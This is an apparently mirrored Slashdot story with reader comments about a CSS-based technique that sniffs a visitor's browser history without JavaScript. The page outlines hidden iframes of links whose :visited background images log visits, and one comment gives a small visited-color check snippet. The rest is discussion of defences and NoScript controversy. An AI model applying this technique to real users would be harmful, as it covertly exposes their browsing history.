Slashdot Mirror
Sniffing Browser History Without Javascript
Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."
... and maybe even nefarious, but you've got to admit: it's a neat hack (in the original sense of the word--i.e., clever)
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
This is not a troll. I wouldn't go so far as saying NoScript is malware, but the author is unscrupulous. For what the addon does, it sure gets updated a lot!
I'm letting it scan my browser now. So far the only thing it has found is Slashdot. It could maybe find sites that I've followed links from Slashdot to. But it won't find much because I run a separate browser instance, with its own (initially empty) browser history, cookies, etc, for each site I visit via by the means I have set up to start a new browser (command line script, and menu selection for the browser). And for those of you who are wanting to tell me "but Firefox just joins all startups into the same process and only gives you a new window". Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.
now we need to go OSS in diesel cars
Comment removed based on user account deletion
It's not DEAD-SIMPLE. I'd imagine the only real way is to kill "visited" functionality all together. Blocking images will just block that one exploit. JS isn't needed for this exploit, but it could be used to create other ones.
If a page has the rule: a:visited { color: red; }
And I have a link element with id="myElement". I can just do something like: if($('myElement').style.color === '#f00') alert('scream real loud (with ajax, or load an image.. or something)');
I just thought of that one off hand. Someone may be able to come up with something trickier that requires no js.
The point here is, the solution is not dead simple.
On the surface it seems like NoScript had descended into the point of malware, but take a look into the history of why Giorgio did what he did and you will see that AdBlockPlus (Wladimir) and EasyList (Ares2) weren't entirely innocent in the matter (namely specifically blacklisting NoScript's domains). I notice that Giorgio was quick to apologise for his part, but Wladimir still refuses to apologise for his actions that certainly contributed.
Yes, there needs to be a more trustworthy NoScript, but at the same time there also need to be a more trustworthy AdBlockPlus and more transparency over subscription filtersets like EasyList.
I, personally have taken AdBlockPlus off my system, not because of this debacle, but because one of the updates recently broke my browser. I have found Privoxy much better suited to my needs.
Alternatively, make browsers download all the pseudoclasses for links, so that it is impossible for sites to use this to track users, but without removing the utility of having marked "visited" links. This could be done by browsers without needing any change to the standards, AFAICT.